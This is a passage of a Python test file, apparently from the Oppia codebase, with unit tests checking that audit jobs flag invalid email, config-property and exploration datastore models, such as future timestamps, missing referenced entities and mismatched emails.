        ) % (self.model_instance.id, self.model_instance.last_updated)]
        # NOTE(review): MockDatetime13Hours shifts the clock the job sees so
        # last_updated appears to be in the future — confirm against its
        # definition earlier in this file.
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_config_property_model_failure(self):
        """Snapshots pointing at a deleted ConfigPropertyModel fail the
        config_property_ids field check.
        """
        self.config_model.delete(self.admin_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for config_property_ids '
                'field check of ConfigPropertySnapshotContentModel\', '
                '[u"Entity id config_model-1: based on field '
                'config_property_ids having value config_model, '
                'expect model ConfigPropertyModel with '
                'id config_model but it doesn\'t exist", '
                'u"Entity id config_model-2: based on field '
                'config_property_ids having value config_model, expect model '
                'ConfigPropertyModel with id config_model but it '
                'doesn\'t exist"]]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
        # literal_eval: the two entity messages may arrive in either order.
        run_job_and_check_output(self, expected_output, literal_eval=True)

    def test_invalid_config_property_model_version_in_model_id(self):
        """Snapshot id claiming a version above the parent model's version
        is a validation failure.
        """
        model_with_invalid_version_in_id = (
            config_models.ConfigPropertySnapshotContentModel(
                id='config_model-3'))
        model_with_invalid_version_in_id.content = {}
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for config property model '
                'version check of ConfigPropertySnapshotContentModel\', '
                '[u\'Entity id config_model-3: ConfigProperty model '
                'corresponding to id config_model has a version 1 '
                'which is less than the version 3 in snapshot '
                'content model id\']]'
            ),
            u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class SentEmailModelValidatorTests(test_utils.GenericTestBase):
    """Audit-job tests for SentEmailModel validation."""

    def setUp(self):
        """Creates sender/recipient users and one SentEmailModel whose hash
        is forced to a known value so it can be fetched deterministically.
        """
        super(SentEmailModelValidatorTests, self).setUp()

        # Deterministic hash so the model can be retrieved by
        # get_by_hash('Email Hash') below.
        def mock_generate_hash(
                unused_cls, unused_recipient_id, unused_email_subject,
                unused_email_body):
            return 'Email Hash'

        self.sender_email = 'sender@email.com'
        self.sender_id = 'sender'
        self.sender_model = user_models.UserSettingsModel(
            id=self.sender_id, email=self.sender_email)
        self.sender_model.put()

        self.recipient_email = 'recipient@email.com'
        self.recipient_id = 'recipient'
        self.recipient_model = user_models.UserSettingsModel(
            id=self.recipient_id, email=self.recipient_email)
        self.recipient_model.put()

        with self.swap(
            email_models.SentEmailModel, '_generate_hash',
            types.MethodType(mock_generate_hash, email_models.SentEmailModel)):
            email_models.SentEmailModel.create(
                self.recipient_id, self.recipient_email, self.sender_id,
                self.sender_email, feconf.EMAIL_INTENT_SIGNUP,
                'Email Subject', 'Email Body', datetime.datetime.utcnow())

        self.model_instance = email_models.SentEmailModel.get_by_hash(
            'Email Hash')[0]

        self.job_class = (
            prod_validation_jobs_one_off.SentEmailModelAuditOneOffJob)

    def test_standard_model(self):
        """A freshly created SentEmailModel validates cleanly."""
        expected_output = [u'[u\'fully-validated SentEmailModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of SentEmailModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        # Push sent_datetime into the past so that, under the mocked clock,
        # only the last_updated check fails (not the sent-datetime check).
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() - datetime.timedelta(hours=20))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_sender_id(self):
        """A deleted sender UserSettingsModel fails the sender_id check."""
        self.sender_model.delete()
        expected_output = [(
            u'[u\'failed validation check for sender_id field check of '
            'SentEmailModel\', '
            '[u"Entity id %s: based on field sender_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.sender_id, self.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_recipient_id(self):
        """A deleted recipient UserSettingsModel fails the recipient_id
        check.
        """
        self.recipient_model.delete()
        expected_output = [(
            u'[u\'failed validation check for recipient_id field check of '
            'SentEmailModel\', '
            '[u"Entity id %s: based on field recipient_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.recipient_id, self.recipient_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_sender_email(self):
        """A sender email mismatching the sender's user settings fails the
        sender email check.
        """
        self.sender_model.email = 'invalid@email.com'
        self.sender_model.put()
        expected_output = [(
            u'[u\'failed validation check for sender email check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Sender email %s in entity does not match with '
            'email %s of user obtained through sender id %s\']]') % (
                self.model_instance.id, self.model_instance.sender_email,
                self.sender_model.email, self.model_instance.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_recipient_email(self):
        """A recipient email mismatching the recipient's user settings fails
        the recipient email check.
        """
        self.recipient_model.email = 'invalid@email.com'
        self.recipient_model.put()
        expected_output = [(
            u'[u\'failed validation check for recipient email check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Recipient email %s in entity does not match '
            'with email %s of user obtained through recipient id %s\']]') % (
                self.model_instance.id, self.model_instance.recipient_email,
                self.recipient_model.email, self.model_instance.recipient_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_sent_datetime_greater_than_current_time(self):
        """A sent_datetime in the future is a validation failure."""
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for sent datetime check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: The sent_datetime field has a value %s '
            'which is greater than the time when the job was run\']]') % (
                self.model_instance.id, self.model_instance.sent_datetime)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """An id not matching the SentEmailModel id regex is reported."""
        model_instance_with_invalid_id = email_models.SentEmailModel(
            id='invalid', recipient_id=self.recipient_id,
            recipient_email=self.recipient_email, sender_id=self.sender_id,
            sender_email=self.sender_email, intent=feconf.EMAIL_INTENT_SIGNUP,
            subject='Email Subject', html_body='Email Body',
            sent_datetime=datetime.datetime.utcnow())
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated SentEmailModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'SentEmailModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % 'invalid']
        run_job_and_check_output(self, expected_output, sort=True)
class BulkEmailModelValidatorTests(test_utils.GenericTestBase):
    """Audit-job tests for BulkEmailModel validation."""

    def setUp(self):
        """Creates one sender, two recipients, and a bulk marketing email
        addressed to both recipients.
        """
        super(BulkEmailModelValidatorTests, self).setUp()

        self.sender_email = 'sender@email.com'
        self.sender_id = 'sender'
        self.sender_model = user_models.UserSettingsModel(
            id=self.sender_id, email=self.sender_email)
        self.sender_model.put()

        self.recipient_ids = ['recipient1', 'recipient2']
        self.recipient_model_1 = user_models.UserSettingsModel(
            id=self.recipient_ids[0], email='recipient1@email.com')
        self.recipient_model_1.put()
        self.recipient_model_2 = user_models.UserSettingsModel(
            id=self.recipient_ids[1], email='recipient2@email.com')
        self.recipient_model_2.put()

        self.model_id = 'bulkemailid1'
        email_models.BulkEmailModel.create(
            self.model_id, self.recipient_ids, self.sender_id,
            self.sender_email, feconf.BULK_EMAIL_INTENT_MARKETING,
            'Email Subject', 'Email Body', datetime.datetime.utcnow())
        self.model_instance = email_models.BulkEmailModel.get_by_id(
            self.model_id)

        self.job_class = (
            prod_validation_jobs_one_off.BulkEmailModelAuditOneOffJob)

    def test_standard_model(self):
        """A freshly created BulkEmailModel validates cleanly."""
        expected_output = [u'[u\'fully-validated BulkEmailModel\', 1]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of BulkEmailModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        # Push sent_datetime into the past so that, under the mocked clock,
        # only the last_updated check fails (not the sent-datetime check).
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() - datetime.timedelta(hours=20))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_sender_id(self):
        """A deleted sender UserSettingsModel fails the sender_id check."""
        self.sender_model.delete()
        expected_output = [(
            u'[u\'failed validation check for sender_id field check of '
            'BulkEmailModel\', '
            '[u"Entity id %s: based on field sender_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.sender_id, self.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_recipient_id(self):
        """A deleted recipient UserSettingsModel fails the recipient_id
        check.
        """
        self.recipient_model_1.delete()
        expected_output = [(
            u'[u\'failed validation check for recipient_id field check of '
            'BulkEmailModel\', '
            '[u"Entity id %s: based on field recipient_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.recipient_ids[0],
                self.recipient_ids[0])]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_sender_email(self):
        """A sender email mismatching the sender's user settings fails the
        sender email check.
        """
        self.sender_model.email = 'invalid@email.com'
        self.sender_model.put()
        expected_output = [(
            u'[u\'failed validation check for sender email check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: Sender email %s in entity does not match with '
            'email %s of user obtained through sender id %s\']]') % (
                self.model_instance.id, self.model_instance.sender_email,
                self.sender_model.email, self.model_instance.sender_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_sent_datetime_greater_than_current_time(self):
        """A sent_datetime in the future is a validation failure."""
        self.model_instance.sent_datetime = (
            datetime.datetime.utcnow() + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for sent datetime check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: The sent_datetime field has a value %s '
            'which is greater than the time when the job was run\']]') % (
                self.model_instance.id, self.model_instance.sent_datetime)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_id(self):
        """An id not matching the BulkEmailModel id regex is reported."""
        model_instance_with_invalid_id = email_models.BulkEmailModel(
            id='invalid:id', recipient_ids=self.recipient_ids,
            sender_id=self.sender_id, sender_email=self.sender_email,
            intent=feconf.BULK_EMAIL_INTENT_MARKETING,
            subject='Email Subject', html_body='Email Body',
            sent_datetime=datetime.datetime.utcnow())
        model_instance_with_invalid_id.put()
        expected_output = [(
            u'[u\'fully-validated BulkEmailModel\', 1]'
        ), (
            u'[u\'failed validation check for model id check of '
            'BulkEmailModel\', '
            '[u\'Entity id %s: Entity id does not match regex pattern\']]'
        ) % model_instance_with_invalid_id.id]
        run_job_and_check_output(self, expected_output, sort=True)
class GeneralFeedbackEmailReplyToIdModelValidatorTests(
        test_utils.GenericTestBase):
    """Audit-job tests for GeneralFeedbackEmailReplyToIdModel validation."""

    def setUp(self):
        """Creates a feedback thread, a user, and the reply-to-id model
        linking the two.
        """
        super(GeneralFeedbackEmailReplyToIdModelValidatorTests, self).setUp()

        self.thread_id = feedback_services.create_thread(
            'exploration', 'expid', None, 'a subject', 'some text')

        self.signup(USER_EMAIL, USER_NAME)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)

        self.model_instance = (
            email_models.GeneralFeedbackEmailReplyToIdModel.create(
                self.user_id, self.thread_id))
        self.model_instance.put()

        self.job_class = (
            prod_validation_jobs_one_off
            .GeneralFeedbackEmailReplyToIdModelAuditOneOffJob)

    def test_standard_model(self):
        """A freshly created reply-to-id model validates cleanly."""
        expected_output = [(
            u'[u\'fully-validated GeneralFeedbackEmailReplyToIdModel\', 1]')]
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance.created_on = (
            self.model_instance.last_updated + datetime.timedelta(days=1))
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance.id, self.model_instance.created_on,
                self.model_instance.last_updated
            )]
        run_job_and_check_output(self, expected_output)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance.id, self.model_instance.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_user_id(self):
        """A deleted user fails the item.id.user_id field check."""
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [(
            u'[u\'failed validation check for item.id.user_id field check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u"Entity id %s: based on field item.id.user_id having value '
            '%s, expect model UserSettingsModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.user_id, self.user_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_non_existent_thread_id(self):
        """A deleted feedback thread fails the item.id.thread_id check."""
        feedback_models.GeneralFeedbackThreadModel.get_by_id(
            self.thread_id).delete()
        expected_output = [(
            u'[u\'failed validation check for item.id.thread_id field check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u"Entity id %s: based on field item.id.thread_id having value '
            '%s, expect model GeneralFeedbackThreadModel with '
            'id %s but it doesn\'t exist"]]') % (
                self.model_instance.id, self.thread_id, self.thread_id)]
        run_job_and_check_output(self, expected_output)

    def test_model_with_invalid_reply_to_id(self):
        """A reply_to_id longer than REPLY_TO_ID_LENGTH is reported."""
        # Grow reply_to_id until it exceeds the allowed maximum length.
        while len(
                self.model_instance.reply_to_id) <= (
                    email_models.REPLY_TO_ID_LENGTH):
            self.model_instance.reply_to_id = (
                self.model_instance.reply_to_id + 'invalid')
        self.model_instance.put()
        expected_output = [(
            u'[u\'failed validation check for reply_to_id length check of '
            'GeneralFeedbackEmailReplyToIdModel\', '
            '[u\'Entity id %s: reply_to_id %s should have length less than or '
            'equal to %s but instead has length %s\']]'
        ) % (
            self.model_instance.id, self.model_instance.reply_to_id,
            email_models.REPLY_TO_ID_LENGTH,
            len(self.model_instance.reply_to_id))]
        run_job_and_check_output(self, expected_output)
class ExplorationModelValidatorTests(test_utils.GenericTestBase):
    """Audit-job tests for ExplorationModel validation."""

    def setUp(self):
        """Creates three explorations with ids '0'-'2'; exploration '0' uses
        language code 'ar' so it can be invalidated by shrinking the set of
        allowed language codes in a test below.
        """
        super(ExplorationModelValidatorTests, self).setUp()

        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)

        language_codes = ['ar', 'en', 'en']
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
            language_code=language_codes[i]
        ) for i in xrange(3)]

        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)

        self.model_instance_0 = exp_models.ExplorationModel.get_by_id('0')
        self.model_instance_1 = exp_models.ExplorationModel.get_by_id('1')
        self.model_instance_2 = exp_models.ExplorationModel.get_by_id('2')

        self.job_class = (
            prod_validation_jobs_one_off.ExplorationModelAuditOneOffJob)

    def test_standard_operation(self):
        """All three explorations validate cleanly after an update."""
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')

        expected_output = [
            u'[u\'fully-validated ExplorationModel\', 3]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.commit(
            feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        # Delete the other two explorations so only one entity is reported.
        self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_invalid_exploration_schema(self):
        """An exploration failing domain validation (here: a language code
        removed from the allowed set) is reported.
        """
        expected_output = [
            (
                u'[u\'failed validation check for domain object check of '
                'ExplorationModel\', '
                '[u\'Entity id %s: Entity fails domain validation with the '
                'error Invalid language_code: %s\']]'
            ) % (self.model_instance_0.id, self.model_instance_0.language_code),
            u'[u\'fully-validated ExplorationModel\', 2]']
        # Restrict allowed languages to English only; exploration '0' is 'ar'.
        with self.swap(
            constants, 'ALL_LANGUAGE_CODES', [{
                'code': 'en', 'description': 'English'}]):
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_commit_log_entry_model_failure(self):
        """A missing ExplorationCommitLogEntryModel fails the
        exploration_commit_log_entry_ids field check.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        exp_models.ExplorationCommitLogEntryModel.get_by_id(
            'exploration-0-1').delete()

        expected_output = [
            (
                u'[u\'failed validation check for '
                'exploration_commit_log_entry_ids field check of '
                'ExplorationModel\', '
                '[u"Entity id 0: based on field '
                'exploration_commit_log_entry_ids having value '
                'exploration-0-1, expect model ExplorationCommitLogEntryModel '
                'with id exploration-0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_summary_model_failure(self):
        """A missing ExpSummaryModel fails the exp_summary_ids check."""
        exp_models.ExpSummaryModel.get_by_id('0').delete()

        expected_output = [
            (
                u'[u\'failed validation check for exp_summary_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field exp_summary_ids having '
                'value 0, expect model ExpSummaryModel with id 0 '
                'but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_rights_model_failure(self):
        """A missing ExplorationRightsModel fails the
        exploration_rights_ids check.
        """
        exp_models.ExplorationRightsModel.get_by_id(
            '0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])

        expected_output = [
            (
                u'[u\'failed validation check for exploration_rights_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field exploration_rights_ids '
                'having value 0, expect model ExplorationRightsModel '
                'with id 0 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_metadata_model_failure(self):
        """A missing ExplorationSnapshotMetadataModel fails the
        snapshot_metadata_ids check.
        """
        exp_models.ExplorationSnapshotMetadataModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_metadata_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field snapshot_metadata_ids having '
                'value 0-1, expect model ExplorationSnapshotMetadataModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_snapshot_content_model_failure(self):
        """A missing ExplorationSnapshotContentModel fails the
        snapshot_content_ids check.
        """
        exp_models.ExplorationSnapshotContentModel.get_by_id(
            '0-1').delete()
        expected_output = [
            (
                u'[u\'failed validation check for snapshot_content_ids '
                'field check of ExplorationModel\', '
                '[u"Entity id 0: based on field snapshot_content_ids having '
                'value 0-1, expect model ExplorationSnapshotContentModel '
                'with id 0-1 but it doesn\'t exist"]]'),
            u'[u\'fully-validated ExplorationModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotMetadataModelValidatorTests(
        test_utils.GenericTestBase):
    """Audit-job tests for ExplorationSnapshotMetadataModel validation."""

    def setUp(self):
        """Creates three explorations; exploration '0' is committed by a
        plain user (not the owner) so committer-related checks can target it.
        """
        super(ExplorationSnapshotMetadataModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.signup(USER_EMAIL, USER_NAME)

        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        self.user_id = self.get_user_id_from_email(USER_EMAIL)

        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]

        for exp in explorations:
            if exp.id != '0':
                exp_services.save_new_exploration(self.owner_id, exp)
            else:
                exp_services.save_new_exploration(self.user_id, exp)

        self.model_instance_0 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '1-1'))
        self.model_instance_2 = (
            exp_models.ExplorationSnapshotMetadataModel.get_by_id(
                '2-1'))

        self.job_class = (
            prod_validation_jobs_one_off
            .ExplorationSnapshotMetadataModelAuditOneOffJob)

    def test_standard_operation(self):
        """All four snapshot metadata models validate cleanly after an
        update creates a second snapshot for exploration '0'.
        """
        exp_services.update_exploration(
            self.owner_id, '0', [exp_domain.ExplorationChange({
                'cmd': 'edit_exploration_property',
                'property_name': 'title',
                'new_value': 'New title'
            })], 'Changes.')
        expected_output = [
            u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 4]']
        run_job_and_check_output(self, expected_output)

    def test_model_with_created_on_greater_than_last_updated(self):
        """created_on later than last_updated is a validation failure."""
        self.model_instance_0.created_on = (
            self.model_instance_0.last_updated + datetime.timedelta(days=1))
        self.model_instance_0.put()
        expected_output = [(
            u'[u\'failed validation check for time field relation check '
            'of ExplorationSnapshotMetadataModel\', '
            '[u\'Entity id %s: The created_on field has a value '
            '%s which is greater than the value '
            '%s of last_updated field\']]') % (
                self.model_instance_0.id,
                self.model_instance_0.created_on,
                self.model_instance_0.last_updated
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_model_with_last_updated_greater_than_current_time(self):
        """last_updated in the (mocked) future is a validation failure."""
        # Delete the other two snapshots so only one entity is reported.
        self.model_instance_1.delete()
        self.model_instance_2.delete()
        expected_output = [(
            u'[u\'failed validation check for current time check of '
            'ExplorationSnapshotMetadataModel\', '
            '[u\'Entity id %s: The last_updated field has a '
            'value %s which is greater than the time when the job was run\']]'
        ) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
        with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
            db.DateTimeProperty, 'data_type', MockDatetime13Hours):
            update_datastore_types_for_mock_datetime()
            run_job_and_check_output(self, expected_output, sort=True)

    def test_missing_exploration_model_failure(self):
        """Snapshots pointing at a deleted ExplorationModel fail the
        exploration_ids field check (deletion itself adds snapshot 0-2).
        """
        exp_models.ExplorationModel.get_by_id('0').delete(
            self.user_id, '', [])
        expected_output = [
            (
                u'[u\'failed validation check for exploration_ids '
                'field check of ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field exploration_ids '
                'having value 0, expect model ExplorationModel with '
                'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
                'exploration_ids having value 0, expect model '
                'ExplorationModel with id 0 but it doesn\'t exist"]]'
            ), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(
            self, expected_output, literal_eval=True)

    def test_missing_committer_model_failure(self):
        """A deleted committer UserSettingsModel fails the committer_ids
        field check.
        """
        user_models.UserSettingsModel.get_by_id(self.user_id).delete()
        expected_output = [
            (
                u'[u\'failed validation check for committer_ids field '
                'check of ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: based on field committer_ids having '
                'value %s, expect model UserSettingsModel with id %s '
                'but it doesn\'t exist"]]'
            ) % (self.user_id, self.user_id), (
                u'[u\'fully-validated '
                'ExplorationSnapshotMetadataModel\', 2]')]
        run_job_and_check_output(self, expected_output, sort=True)

    def test_invalid_exploration_version_in_model_id(self):
        """A snapshot id claiming a version above the exploration's version
        is a validation failure.
        """
        model_with_invalid_version_in_id = (
            exp_models.ExplorationSnapshotMetadataModel(
                id='0-3', committer_id=self.owner_id, commit_type='edit',
                commit_message='msg', commit_cmds=[{}]))
        model_with_invalid_version_in_id.put()
        expected_output = [
            (
                u'[u\'failed validation check for exploration model '
                'version check of ExplorationSnapshotMetadataModel\', '
                '[u\'Entity id 0-3: Exploration model corresponding to '
                'id 0 has a version 1 which is less than the version 3 in '
                'snapshot metadata model id\']]'
            ), (
                u'[u\'fully-validated ExplorationSnapshotMetadataModel\', '
                '3]')]
        run_job_and_check_output(self, expected_output, sort=True)

    # NOTE: method name misspells "schema" as "schmea"; kept for consistency
    # with the sibling test classes in this file.
    def test_model_with_invalid_commit_cmd_schmea(self):
        """Commit commands failing domain validation (missing required
        attributes, extra attributes) are reported per-command.
        """
        self.model_instance_0.commit_cmds = [{
            'cmd': 'add_state'
        }, {
            'cmd': 'delete_state',
            'invalid_attribute': 'invalid'
        }]
        self.model_instance_0.put()
        expected_output = [
            (
                u'[u\'failed validation check for commit '
                'cmd delete_state check of '
                'ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'delete_state\', '
                'u\'invalid_attribute\': u\'invalid\'} failed with error: '
                'The following required attributes are missing: '
                'state_name, The following extra attributes are present: '
                'invalid_attribute"]]'
            ), (
                u'[u\'failed validation check for commit '
                'cmd add_state check of '
                'ExplorationSnapshotMetadataModel\', '
                '[u"Entity id 0-1: Commit command domain validation '
                'for command: {u\'cmd\': u\'add_state\'} '
                'failed with error: The following required attributes '
                'are missing: state_name"]]'
            ), u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 2]']
        run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
    """Tests for the one-off audit job that validates
    ExplorationSnapshotContentModel instances.
    """
    def setUp(self):
        """Creates three default explorations; saving each also creates its
        version-1 snapshot content model (id '<exploration id>-1').
        """
        super(ExplorationSnapshotContentModelValidatorTests, self).setUp()
        self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
        self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
        explorations = [exp_domain.Exploration.create_default_exploration(
            '%s' % i,
            title='title %d' % i,
            category='category%d' % i,
        ) for i in xrange(3)]
        for exp in explorations:
            exp_services.save_new_exploration(self.owner_id, exp)
        self.model_instance_0 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
                '0-1'))
        self.model_instance_1 = (
            exp_models.ExplorationSnapshotContentModel.get_by_id(
